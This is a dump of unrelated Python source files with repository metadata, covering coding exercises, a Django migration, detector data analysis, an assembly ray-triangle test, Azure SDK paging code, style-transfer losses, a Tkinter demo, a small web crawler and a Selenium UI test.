8f6c4afa0b6d1e1e934af6ba173c00eae249f42e
refs/heads/master
2021-08-27T17:57:34.391358
2021-08-13T15:17:17
2021-08-13T15:17:17
143,048,178
0
0
null
null
null
null
UTF-8
Python
false
false
325
py
''' Given 2 numbers, provide number of all perfect squares between them ''' import math a, b = map(int, input().strip().split()) i = 0 for x in range(int(math.ceil(a ** (1 / 2))), b): if x ** 2 <= b: i += 1 # print(x) else: break print(i) ''' Input 1 50 25590 26590 9 49 Output 7 4 5 '''
a2c079a98705ce6a129fe2a91296597395f2abee
afb2bdf8044e4c9ff09b1b8379efbc17867d8cc0
/4parts/challenge/challenge2.py
e60f5117ceda493cf23d8d7097d1376bfa4b1068
[]
no_license
ChenFu0420/leranpython
b2e364ff8d6730a3eb768b76f0369faa3367dfa2
52d0aa614d7fab19e17bbb696330a0330d3862b6
refs/heads/master
2020-05-29T19:46:24.020046
2019-09-25T09:17:10
2019-09-25T09:17:10
189,339,151
0
0
null
null
null
null
UTF-8
Python
false
false
158
py
n = eval(input()) for i in range(n): for j in range(0, n - i): print(end=" ") for k in range(2 * i + 1): print("*",end="") print()
974d749d361019cdd9d6bb1b34a159f82ee40042
5d6201c7da4f19bc92f003b98629a10bd62e2426
/main/migrations/0002_auto_20151106_1447.py
2124b4360f205d273ee5ba1b8c5961096578fe9e
[]
no_license
azul-cloud/travelblogwave
35b24cf9550a544eeaeaa01d99b085930f5f410b
8c5dba290723484c3832606e9da0deba642395de
refs/heads/master
2021-01-21T05:01:11.100319
2016-05-30T12:25:25
2016-05-30T12:25:25
22,630,820
0
0
null
null
null
null
UTF-8
Python
false
false
532
py
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('main', '0001_initial'), ] operations = [ migrations.AlterField( model_name='user', name='username', field=models.CharField(help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=30, verbose_name='username'), preserve_default=False, ), ]
c4de4f95686f6d39c4a347e4462b601fbc2bd6d2
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p03828/s176803120.py
3c09dd5cfe45d562d5aee2961335ac10dec7d7b7
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
634
py
from collections import Counter MOD = 10 ** 9 + 7 def factorize(n): """ Simple factorize :param n: number to factorize :return: list of factors time complexity : O(n√n) space complexity : O(n) """ factors = [] for i in range(2, n+1): while n % i == 0: n = n // i factors.append(i) return factors def main(): N = int(input()) factors = [] for i in range(1, N+1): factors += factorize(i) factor_counts = list(Counter(factors).values()) ans = 1 for v in factor_counts: ans = ans * (v+1) % MOD print(ans) main()
9e5b1b073c0e724704be0a80caf06b160652600f
abc1a497c41ddd8669c8c41da18af65d08ca54e4
/try/recon/analize_recon_event.py
94841cb3f10478d5f14b3da82297e1331ee0b6fd
[]
no_license
gerakolt/direxeno_privet
fcef5e3b654720e277c48935acc168472dfd8ecc
75e88fb1ed44fce32fce02677f64106121259f6d
refs/heads/master
2022-12-20T22:01:30.825891
2020-10-04T06:01:07
2020-10-04T06:01:07
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,176
py
import numpy as np import matplotlib.pyplot as plt import matplotlib.colors as mcolors import time import os import sys pmts=np.array([0,1,4,7,8,15]) BGpath='/home/gerak/Desktop/DireXeno/190803/BG/EventRecon/' path='/home/gerak/Desktop/DireXeno/190803/Co57/EventRecon/' blw_cut=15 init_cut=20 chi2_cut=5000 left=0 right=400 Rec=np.recarray(100000, dtype=[ ('area', 'i8', len(pmts)), ('blw', 'f8', len(pmts)), ('id', 'i8'), ('chi2', 'f8', len(pmts)), ('h', 'i8', (200, len(pmts))), ('init_event', 'i8'), ('init_wf', 'i8', len(pmts)) ]) j=0 id=0 WFs=np.zeros((len(pmts), 1000)) recon_WFs=np.zeros((len(pmts), 1000)) # for filename in os.listdir(path): # if filename.endswith(".npz") and filename.startswith("recon1ns"): # print(filename) # data=np.load(path+filename) # rec=data['rec'] # WFs+=data['WFs'] # recon_WFs+=data['recon_WFs'] # for r in rec: # Rec[j]['area']=r['area'] # Rec[j]['blw']=r['blw'] # Rec[j]['id']=r['id'] # Rec[j]['chi2']=r['chi2'] # Rec[j]['init_wf']=r['init_wf'] # Rec[j]['h']=r['h'] # Rec[j]['init_event']=r['init_event'] # if r['id']>id: # id=r['id'] # j+=1 # # sys.exit() # os.remove(path+filename) # np.savez(path+'recon1ns'.format(id), rec=Rec[:j-1], WFs=WFs, recon_WFs=recon_WFs) data=np.load(BGpath+'recon1ns.npz') BG=data['rec'] data=np.load(path+'recon1ns.npz') rec=data['rec'] WFs=data['WFs'] recon_WFs=data['recon_WFs'] fig, ax=plt.subplots(2,3) fig.subplots_adjust(wspace=0, hspace=0) fig.suptitle('Co57', fontsize=25) x=np.arange(1000)/5 for i in range(len(pmts)): np.ravel(ax)[i].plot(x, WFs[i], 'r1', label='WF: PMT{}'.format(pmts[i])) np.ravel(ax)[i].plot(x, recon_WFs[i], 'b-.', label='Recon') np.ravel(ax)[i].legend(fontsize=12) fig, ax=plt.subplots(2,3) fig.suptitle('Co57', fontsize=25) x=np.arange(1000)/5 for i in range(len(pmts)): np.ravel(ax)[i].hist(rec['init_wf'][:,i], bins=100, range=[0,400], label='PMT{} init_wf'.format(pmts[i])) np.ravel(ax)[i].legend(fontsize=15) rec=rec[np.all(rec['init_wf']>init_cut, axis=1)] BG=BG[np.all(BG['init_wf']>init_cut, axis=1)] fig, ax=plt.subplots(2,3) fig.subplots_adjust(wspace=0, hspace=0) fig.suptitle('Co57', fontsize=25) x=np.arange(1000)/5 for i in range(len(pmts)): np.ravel(ax)[i].hist(rec['blw'][:,i], bins=100, range=[0,30], label='PMT{} BLW'.format(pmts[i])) np.ravel(ax)[i].legend(fontsize=15) plt.figure() plt.hist(np.sqrt(np.sum(rec['blw']**2, axis=1)), bins=100, label='BLW', range=[0,30]) plt.axvline(blw_cut, ymin=0, ymax=1, color='k') plt.legend(fontsize=15) rec=rec[np.sqrt(np.sum(rec['blw']**2, axis=1))<blw_cut] BG=BG[np.sqrt(np.sum(BG['blw']**2, axis=1))<blw_cut] fig, ax=plt.subplots(3,2) fig.subplots_adjust(wspace=0, hspace=0) fig.suptitle('Co57', fontsize=25) for i in range(len(pmts)): np.ravel(ax)[i].hist(rec['chi2'][:,i], bins=100, label='PMT{} chi2'.format(pmts[i])) np.ravel(ax)[i].set_yscale('log') np.ravel(ax)[i].legend(fontsize=15) plt.figure() plt.hist(np.sqrt(np.sum(rec['chi2']**2, axis=1)), bins=100, label='chi2') plt.axvline(chi2_cut, ymin=0, ymax=1, color='k') plt.legend(fontsize=15) plt.yscale('log') rec=rec[np.sqrt(np.sum(rec['chi2']**2, axis=1))<chi2_cut] rec=rec[np.sum(np.sum(rec['h'][:,:100,:], axis=2), axis=1)>0] BG=BG[np.sqrt(np.sum(BG['chi2']**2, axis=1))<chi2_cut] BG=BG[np.sum(np.sum(BG['h'][:,:100,:], axis=2), axis=1)>0] init=np.sum(np.sum(rec['h'][:,:10,:], axis=2), axis=1) full=np.sum(np.sum(rec['h'][:,:100,:], axis=2), axis=1) BGinit=np.sum(np.sum(BG['h'][:,:10,:], axis=2), axis=1) BGfull=np.sum(np.sum(BG['h'][:,:100,:], axis=2), axis=1) plt.figure() plt.hist(init/full, bins=100, range=[0,1], label='Relative number of PEs in first 10 ns') rec=rec[init/full<0.5] BG=BG[BGinit/BGfull<0.5] fig, ax=plt.subplots(3,2) fig.subplots_adjust(wspace=0, hspace=0) fig.suptitle('Co57', fontsize=25) for i in range(len(pmts)): np.ravel(ax)[i].plot(np.mean(rec['h'][:,:,i], axis=0), 'k-.', label='PMT{}'.format(pmts[i])) plt.figure() up=np.sum(rec['h'][:,:100,0], axis=1)+np.sum(rec['h'][:,:100,1], axis=1) dn=np.sum(rec['h'][:,:100,-1], axis=1)+np.sum(rec['h'][:,:100,-2], axis=1)+np.sum(rec['h'][:,:100,-3], axis=1) plt.plot(np.arange(450), np.arange(450)*3+18, 'k--') plt.hist2d(up, dn, bins=[100, 100], range=[[0,350], [0,700]], norm=mcolors.PowerNorm(0.3)) plt.xlabel('Sum of PEs in the top floor PMTs', fontsize=25) plt.ylabel('Sum of PEs in the bottom floor PMTs', fontsize=25) rec0=rec rec=rec[dn<3*up+18] plt.legend(fontsize=15) TB=1564926608911-1564916365644 TA=1564916315672-1564886605156 TBG=1564874707904-1564826183355 TCs=1564823506349-1564820274767 hist, bins=np.histogram(np.sum(np.sum(BG['h'][:,:100,:], axis=2), axis=1), bins=np.arange(250)*4) plt.figure() plt.hist(np.sum(np.sum(rec['h'][:,:100,:], axis=2), axis=1), bins=np.arange(250)*4, histtype='step', linewidth=5, label='All events') plt.bar(0.5*(bins[1:]+bins[:-1]) ,TA/TBG*hist, label='BG', width=bins[1:]-bins[:-1], color='orange', alpha=0.5) plt.axvline(left, 0 ,1, color='k') plt.axvline(right, 0 ,1, color='k') plt.legend(fontsize=15) fig, ax=plt.subplots(2,3) # fig.suptitle('Co57 - Spec - slow', fontsize=25) for i in range(len(pmts)): np.ravel(ax)[i].hist(np.sum(rec['h'][:,:,i], axis=1), bins=np.arange(200), histtype='step', label='After\n up-dn cut\n PMT{}'.format(i), linewidth=3) np.ravel(ax)[i].hist(np.sum(rec0['h'][:,:,i], axis=1), bins=np.arange(200), histtype='step', label='Before\n up-dn cut', linewidth=3) np.ravel(ax)[i].legend(fontsize=15) # fig, ax=plt.subplots(3,5) # k=0 # for i in range(len(pmts)-1): # hi=rec['h'][:,:,i] # for j in range(i+1, len(pmts)): # hj=rec['h'][:,:,j] # np.ravel(ax)[k].hist((np.sum(hi, axis=1)-np.mean(np.sum(hi, axis=1)))*(np.sum(hj, axis=1)-np.mean(np.sum(hj, axis=1)))/(np.mean(np.sum(hj, axis=1))*np.mean(np.sum(hi, axis=1))), # label='PMT{}-PMT{}'.format(pmts[i], pmts[j]), bins=100, range=[-1, 1]) # np.ravel(ax)[k].legend() # k+=1 plt.show()
ed7791ad961fa9dd1d63297906e9bc6fdf71ef7c
be84495751737bbf0a8b7d8db2fb737cbd9c297c
/tests/test_intersections/triangle2.py
910e5c8217bcf254300859b37732a19f7136177f
[]
no_license
mario007/renmas
5e38ff66cffb27b3edc59e95b7cf88906ccc03c9
bfb4e1defc88eb514e58bdff7082d722fc885e64
refs/heads/master
2021-01-10T21:29:35.019792
2014-08-17T19:11:51
2014-08-17T19:11:51
1,688,798
1
0
null
null
null
null
UTF-8
Python
false
false
6,283
py
from tdasm import Tdasm, Runtime from renmas.maths import Vector3 from renmas.shapes import Triangle, intersect_ray_shape_array from renmas.core import Ray import random import renmas.utils as util import timeit asm_structs = util.structs("ray", "triangle", "hitpoint") SSE2_ASM = """ #DATA """ SSE2_ASM += asm_structs + """ ray r1 triangle tri1 hitpoint hp float one = 1.0 float zero = 0.0 float epsilon = 0.00001 float beta float coff float min_dist = 999999.0 float xm0[4] float xm1[4] float xm2[4] float xm3[4] float xm4[4] float xm5[4] float xm6[4] float xm7[4] uint32 xm0i[4] uint32 result uint32 n = 1000000 #CODE mov eax, r1 mov ebx, tri1 mov ecx, min_dist mov edx, hp call ray_triangle movaps oword [xm0], xmm0 movaps oword [xm1], xmm1 movaps oword [xm2], xmm2 movaps oword [xm3], xmm3 movaps oword [xm4], xmm4 movaps oword [xm5], xmm5 movaps oword [xm6], xmm6 movaps oword [xm7], xmm7 movaps oword [xm0i], xmm0 mov dword [result], eax #END global ray_triangle: movaps xmm0, oword [ebx + triangle.p0] movaps xmm2, oword [eax + ray.dir] movaps xmm1, xmm0 subps xmm1, oword [ebx + triangle.p2] movaps xmm3, xmm0 subps xmm3, oword [eax + ray.origin] subps xmm0, oword [ebx + triangle.p1] ; f f h f movaps xmm4, xmm1 movlhps xmm4, xmm3 shufps xmm4, xmm4, 01110101B ; k k k l movaps xmm5, xmm2 movhlps xmm5, xmm3 shufps xmm5, xmm5, 00101010B ; f f h f * k k k l movaps xmm7, xmm4 mulps xmm7, xmm5 ; g g g h movaps xmm6, xmm2 movlhps xmm6, xmm3 shufps xmm6, xmm6, 11010101B ; j j l j movaps xmm4, xmm1 movhlps xmm4, xmm3 shufps xmm4, xmm4, 10001010B ; g g g h * j j l j mulps xmm4, xmm6 ; f f h f * k k k l - g g g h * j j l j subps xmm7, xmm4 ; a d a a movaps xmm5, xmm0 movlhps xmm5, xmm3 shufps xmm5, xmm5, 00001000B ; a d a a * (f f h f * k k k l - g g g h * j j l j) mulps xmm7, xmm5 ; i l i i movaps xmm5, xmm0 movhlps xmm5, xmm3 shufps xmm5, xmm5, 10100010B ; g g g h * i l i i mulps xmm6, xmm5 ; e h e e movaps xmm4, xmm0 movlhps xmm4, xmm3 shufps xmm4, xmm4, 01011101B ; k k k l movaps xmm5, xmm2 movhlps xmm5, xmm3 shufps xmm5, xmm5, 00101010B ; e h e e * k k k l mulps xmm5, xmm4 ; g g g h * i l i i - e h e e * k k k l subps xmm6, xmm5 ; b b d b movaps xmm5, xmm1 movlhps xmm5, xmm3 shufps xmm5, xmm5, 00100000B ; b b d b * (g g g h * i l i i - e h e e * k k k l) mulps xmm6, xmm5 addps xmm7, xmm6 ; j j l j movaps xmm5, xmm1 movhlps xmm5, xmm3 shufps xmm5, xmm5, 10001010B ; e e h e * j j l j mulps xmm4, xmm5 ; f f h f movaps xmm6, xmm1 movlhps xmm6, xmm3 shufps xmm6, xmm6, 01110101B ; i l i i movaps xmm5, xmm0 movhlps xmm5, xmm3 shufps xmm5, xmm5, 10100010B ; f f h f * i l i i mulps xmm6, xmm5 ; e h e e * j j l j - f f h f * i l i i subps xmm4, xmm6 ; c c c d movaps xmm5, xmm2 movlhps xmm5, xmm3 shufps xmm5, xmm5, 10000000B ; c c c d * (e h e e * j j l j - f f h f * i l i i) mulps xmm4, xmm5 addps xmm7, xmm4 movhlps xmm5, xmm7 movaps xmm4, xmm7 shufps xmm4, xmm4, 0x55 movaps xmm6, xmm7 shufps xmm6, xmm6, 0xFF ; xmm7 = d ; xmm6 = td ; xmm5 = gamma ; xmm4 = beta pxor xmm3, xmm3 ; beta < 0.0 movaps xmm0, xmm7 xorps xmm0, xmm4 cmpss xmm0, xmm3, 5 ; gamma < 0.0 movaps xmm1, xmm7 xorps xmm1, xmm5 cmpss xmm1, xmm3, 5 ; accumulation of conditions andps xmm0, xmm1 ; beta + gamma < 1.0 movaps xmm2, xmm4 addps xmm2, xmm5 cmpss xmm2, xmm6, 2 andps xmm0, xmm2 movd esi, xmm0 cmp esi, 0 jne _accept xor eax, eax ret _accept: divss xmm6, xmm7 comiss xmm6, dword [epsilon] jc _reject comiss xmm6, dword [ecx] ;minimum distance jnc _reject ;populate hitpoint structure ; t is in xmm6 movaps xmm2, oword [eax + ray.dir] movaps xmm3, oword [ebx + triangle.normal] movss xmm4, dword [ebx + triangle.mat_index] movss dword [edx + hitpoint.t], xmm6 movaps oword [edx + hitpoint.normal], xmm3 movss dword [edx + hitpoint.mat_index], xmm4 macro broadcast xmm5 = xmm6[0] mulps xmm5, xmm2 macro eq128 edx.hitpoint.hit = xmm5 + eax.ray.origin mov eax, 1 ret _reject: xor eax, eax ret """ def create_triangle(): p0 = Vector3(0.1, 0.0, -2.0) p1 = Vector3(4.0, 0.5, 0.2) p2 = Vector3(2.2, 4.3, -1.0) tr = Triangle(p0, p1, p2, 3) return tr def create_ray(): origin = Vector3(0.0, 0.0, 0.0) dirx = 0.985906665972 diry = 0.165777376892 dirz = 0.0224923832256 #direction = Vector3(8.8, 8.9, 8.7) direction = Vector3(dirx, diry, dirz) #direction.normalize() ray = Ray(origin, direction) return ray def v4(v3): return (v3.x, v3.y, v3.z, 0.0) if __name__ == "__main__": tr = create_triangle() ray = create_ray() hp = tr.isect(ray) if hp is not False: print(hp.t) asm = util.get_asm() mc = asm.assemble(SSE2_ASM) #mc.print_machine_code() runtime = Runtime() ds = runtime.load("test", mc) ds["tri1.p0"] = v4(tr.v0) ds["tri1.p1"] = v4(tr.v1) ds["tri1.p2"] = v4(tr.v2) ds["tri1.normal"] = v4(tr.normal) ds["tri1.mat_index"] = tr.material ds["r1.origin"] = v4(ray.origin) ds["r1.dir"] = v4(ray.dir) runtime.run("test") print("xmm0 = ", ds["xm0"]) print("xmm1 = ", ds["xm1"]) print("xmm2 = ", ds["xm2"]) print("xmm3 = ", ds["xm3"]) print("xmm4 = ", ds["xm4"]) print("xmm5 = ", ds["xm5"]) print("xmm6 = ", ds["xm6"]) print("xmm7 = ", ds["xm7"]) print("xmm7i = ", ds["xm0i"]) print("Rezultat je = ", ds["result"]) print(ds["hp.normal"]) print(hp.normal) print(ds["hp.mat_index"]) print(hp.material) print(ds["hp.hit"]) print(hp.hit_point) print(ds["hp.t"]) print(hp.t)
f5e6065e2191f1f68e81fc65acc158143819626d
a884039e1a8b0ab516b80c2186e0e3bad28d5147
/Livros/Livro-Introdução à Programação-Python/Capitulo 7/Exemplos 7/Listagem7_17.py
69bd31b1f28fb805b79086213f580f796b1c8375
[ "MIT" ]
permissive
ramonvaleriano/python-
6e744e8bcd58d07f05cd31d42a5092e58091e9f0
ada70918e945e8f2d3b59555e9ccc35cf0178dbd
refs/heads/main
2023-04-10T14:04:24.497256
2021-04-22T18:49:11
2021-04-22T18:49:11
340,360,400
0
0
null
null
null
null
UTF-8
Python
false
false
197
py
# Program: Listagem7_17.py # Author: Ramon R. Valeriano # Description: # Developed: 18/05/2020 - 20:19 # Updated: m = "Uma linha\nOutra Linhas\nE mais outra linha." print(m) print(m.splitlines())
611ca1b0710e080956b3f0259d5042c17ada5814
bad62c2b0dfad33197db55b44efeec0bab405634
/sdk/signalr/azure-mgmt-signalr/azure/mgmt/signalr/aio/operations/_usages_operations.py
aa1860efef37dbf2413c285639f2957501b5bfdb
[ "LicenseRef-scancode-generic-cla", "MIT", "LGPL-2.1-or-later" ]
permissive
test-repo-billy/azure-sdk-for-python
20c5a2486456e02456de17515704cb064ff19833
cece86a8548cb5f575e5419864d631673be0a244
refs/heads/master
2022-10-25T02:28:39.022559
2022-10-18T06:05:46
2022-10-18T06:05:46
182,325,031
0
0
MIT
2019-07-25T22:28:52
2019-04-19T20:59:15
Python
UTF-8
Python
false
false
5,150
py
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- import functools from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar import warnings from azure.core.async_paging import AsyncItemPaged, AsyncList from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import AsyncHttpResponse from azure.core.rest import HttpRequest from azure.core.tracing.decorator import distributed_trace from azure.core.tracing.decorator_async import distributed_trace_async from azure.mgmt.core.exceptions import ARMErrorFormat from ... import models as _models from ..._vendor import _convert_request from ...operations._usages_operations import build_list_request T = TypeVar('T') ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] class UsagesOperations: """UsagesOperations async operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~azure.mgmt.signalr.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = _models def __init__(self, client, config, serializer, deserializer) -> None: self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config @distributed_trace def list( self, location: str, **kwargs: Any ) -> AsyncIterable["_models.SignalRUsageList"]: """List resource usage quotas by location. :param location: the location like "eastus". :type location: str :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either SignalRUsageList or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.signalr.models.SignalRUsageList] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.SignalRUsageList"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) def prepare_request(next_link=None): if not next_link: request = build_list_request( location=location, subscription_id=self._config.subscription_id, template_url=self.list.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: request = build_list_request( location=location, subscription_id=self._config.subscription_id, template_url=next_link, ) request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request async def extract_data(pipeline_response): deserialized = self._deserialize("SignalRUsageList", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.SignalRService/locations/{location}/usages'} # type: ignore
702e397972e162ab5ddf2af196684a76f393bd61
71673d845952b50986d1c21dc5bbbcab2a2a2651
/introduction_to_lxml.py
0783fcf78d6a6982eff93f7b0558518976c20d60
[]
no_license
afcarl/introductionToWebScraping
77a44bfb7655e44231bed216d37b015e3cf52a5c
d1039aeee87365f2807dd198e53bd1bb6224a550
refs/heads/master
2020-03-26T04:23:54.052825
2015-06-18T14:23:40
2015-06-18T14:23:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
507
py
import requests import lxml.html base_url = "https://www.google.com" def scrape(url,base_url,depth): if depth == 0: return True r = requests.get(url) html = lxml.html.fromstring(r.text) links = html.xpath("//a/@href") for ind,link in enumerate(links): if "http" in link: print link else: print base_url+link links[ind] = base_url+link for link in links: scrape(link,base_url,depth-1) scrape(base_url,base_url,5)
736a6dd319cdb36e01d57e42fdf371c5db550c22
6fcfb638fa725b6d21083ec54e3609fc1b287d9e
/python/ghwatson_faststyle/faststyle-master/losses.py
7a4cc6b60cea27257d8a4820a88ca8fb5d7f1574
[]
no_license
LiuFang816/SALSTM_py_data
6db258e51858aeff14af38898fef715b46980ac1
d494b3041069d377d6a7a9c296a14334f2fa5acc
refs/heads/master
2022-12-25T06:39:52.222097
2019-12-12T08:49:07
2019-12-12T08:49:07
227,546,525
10
7
null
2022-12-19T02:53:01
2019-12-12T07:29:39
Python
UTF-8
Python
false
false
3,526
py
""" This file contains the different loss functions. File author: Grant Watson Date: Feb 2017 """ import tensorflow as tf import numpy as np def content_loss(content_layers, target_content_layers, content_weights): """Defines the content loss function. :param content_layers List of tensors for layers derived from training graph. :param target_content_layers List of placeholders to be filled with content layer data. :param content_weights List of floats to be used as weights for content layers. """ assert(len(target_content_layers) == len(content_layers)) num_content_layers = len(target_content_layers) # Content loss content_losses = [] for i in xrange(num_content_layers): content_layer = content_layers[i] target_content_layer = target_content_layers[i] content_weight = content_weights[i] loss = tf.reduce_sum(tf.squared_difference(content_layer, target_content_layer)) loss = content_weight * loss _, h, w, c = content_layer.get_shape().as_list() num_elements = h * w * c loss = loss / tf.cast(num_elements, tf.float32) content_losses.append(loss) content_loss = tf.add_n(content_losses, name='content_loss') return content_loss def style_loss(grams, target_grams, style_weights): """Defines the style loss function. :param grams List of tensors for Gram matrices derived from training graph. :param target_grams List of numpy arrays for Gram matrices precomputed from style image. :param style_weights List of floats to be used as weights for style layers. """ assert(len(grams) == len(target_grams)) num_style_layers = len(target_grams) # Style loss style_losses = [] for i in xrange(num_style_layers): gram, target_gram = grams[i], target_grams[i] style_weight = style_weights[i] _, c1, c2 = gram.get_shape().as_list() size = c1*c2 loss = tf.reduce_sum(tf.square(gram - tf.constant(target_gram))) loss = style_weight * loss / size style_losses.append(loss) style_loss = tf.add_n(style_losses, name='style_loss') return style_loss def tv_loss(X): """Creates 2d TV loss using X as the input tensor. Acts on different colour channels individually, and uses convolution as a means of calculating the differences. :param X: 4D Tensor """ # These filters for the convolution will take the differences across the # spatial dimensions. Constructing these on paper has to be done carefully, # but can be easily understood when one realizes that the sub-3x3 arrays # should have no mixing terms as the RGB channels should not interact # within this convolution. Thus, the 2 3x3 subarrays are identity and # -1*identity. The filters should look like: # v_filter = [ [(3x3)], [(3x3)] ] # h_filter = [ [(3x3), (3x3)] ] ident = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]]) v_array = np.array([[ident], [-1*ident]]) h_array = np.array([[ident, -1*ident]]) v_filter = tf.constant(v_array, tf.float32) h_filter = tf.constant(h_array, tf.float32) vdiff = tf.nn.conv2d(X, v_filter, strides=[1, 1, 1, 1], padding='VALID') hdiff = tf.nn.conv2d(X, h_filter, strides=[1, 1, 1, 1], padding='VALID') loss = tf.reduce_sum(tf.square(hdiff)) + tf.reduce_sum(tf.square(vdiff)) return loss
4de4a3deb1892d8a98427efd454a04849d8f4eda
f2fcf807b441aabca1ad220b66770bb6a018b4ae
/coderbyte/letter_capitalize.py
0db39e3300d9e2d0d879d72ba1ae2420481d6fcb
[]
no_license
gokou00/python_programming_challenges
22d1c53ccccf1f438754edad07b1d7ed77574c2c
0214d60074a3b57ff2c6c71a780ce5f9a480e78c
refs/heads/master
2020-05-17T15:41:07.759580
2019-04-27T16:36:56
2019-04-27T16:36:56
183,797,459
0
0
null
null
null
null
UTF-8
Python
false
false
150
py
def LetterCapitalize(str): # code goes here return str.title() print(LetterCapitalize("h3llo yo people"))
12b99157ef91baeba1b980e70567b5588589fb0c
a616d3f1491eae4a702d18ab30e2b3cfd43e1563
/scrollbar.py
a43c58dca1721d5742a1355ef8ec4ffaf02cb63d
[]
no_license
supriadi-yusuf/python-GUI
9d15c27fcaabb55aa61ccabef2afcc3f9a26370f
557ab9720442d7d810567441119c3efa4b1b7b34
refs/heads/master
2020-06-29T16:47:58.236428
2019-08-07T01:09:09
2019-08-07T01:09:09
200,570,926
0
0
null
null
null
null
UTF-8
Python
false
false
579
py
from tkinter import ( Tk, RIGHT, Y, Scrollbar, Listbox, END, BOTH, LEFT ) layar=Tk() layar.title("Scrollbar") myScrollbar = Scrollbar(master=layar) #myScrollbar.pack(side=RIGHT, fill=Y) #myScrollbar.pack(side=LEFT, fill=Y) myList = Listbox(master=layar, #height=5, yscrollcommand=myScrollbar.set) for line in range(100): myList.insert(END, "This is line number " + str(line)) #myList.pack(side=LEFT,fill=BOTH) myList.pack(side=LEFT,fill=Y) myScrollbar.pack(side=LEFT, fill=Y) myScrollbar.config(command=myList.yview) layar.mainloop()
40a5badf20a8815924f3d9ea4e245dba81149a88
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p03588/s910432178.py
314d7a583d1067ee67cd31e93342774353c07a3a
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
301
py
import sys def solve(): readline = sys.stdin.buffer.readline mod = 10 ** 9 + 7 n = int(readline()) ab = [list(map(int, readline().split())) for _ in range(n)] ab.sort() print((ab[-1][0] - ab[0][0] + 1) + (ab[0][0] - 1) + (ab[-1][1])) if __name__ == '__main__': solve()
29062d2f0a805afd6dd76b3910c7c60daac28586
4178f2916d2da72cbb45454fbed941dcfe8f6460
/POM_test/TestCase/Planting/TC_024.py
c2bd74617e33da7d058bb5c6912275c3dd5bd85e
[]
no_license
maxcrup007/Selenium_Webdriver_Python
15196cb04ba5cafdc5b776c26d167f0b48fb0e14
6be7f0b9f53df1ba592957029e8a4d22e409d1c4
refs/heads/main
2023-03-24T21:04:31.976451
2021-03-22T09:16:04
2021-03-22T09:16:04
349,379,454
0
0
null
null
null
null
UTF-8
Python
false
false
2,607
py
# ทดสอบการเข้าใช้งานของ "ปลูก" (เลือกจำนวนเพาะปลูกมากกว่าพื้นที่) import time import unittest import sys from selenium import webdriver from POM_test.login import * from POM_test.plantPage import * import os sys.path.append(os.path.join(os.path.dirname(__file__), "...", "...")) class TestPlanting_24(unittest.TestCase): @classmethod def setUpClass(self): self.driver = webdriver.Chrome(executable_path="C:/Users/voraw/Downloads/Compressed/webdriver/chromedriver/chromedriver") self.driver.implicitly_wait(10) self.driver.maximize_window() def test_login_valid(self): driver = self.driver self.driver.get("https://top-upstream-client.mulberrysoft.com/#/older/activity") login = LoginPage(driver) login.enter_username("demo005") login.enter_password("123456") login.click_login() time.sleep(2) plant = PlantPage(driver) plant.into_plantPage() plant.upload_picture() time.sleep(2) plant.next_function() time.sleep(2) plant.plant_enter_value("1000000") # เลือกจำนวนเพาะปลูกมากกว่าพื้นที่ time.sleep(2) plant.plant_enter_area("10") time.sleep(2) plant.plant_enter_crops() time.sleep(2) # driver.find_element_by_xpath("//ion-list[2]/ion-item/ion-select").click() # driver.find_element_by_xpath("//button/div/div[2]").click() # driver.find_element_by_xpath("//button[2]/span").click() plant.plant_enter_garden() time.sleep(2) plant.plant_enter_unit() time.sleep(2) plant.plant_enter_area_unit() time.sleep(2) ######################################################################## plant.plant_enter_products("100") time.sleep(2) 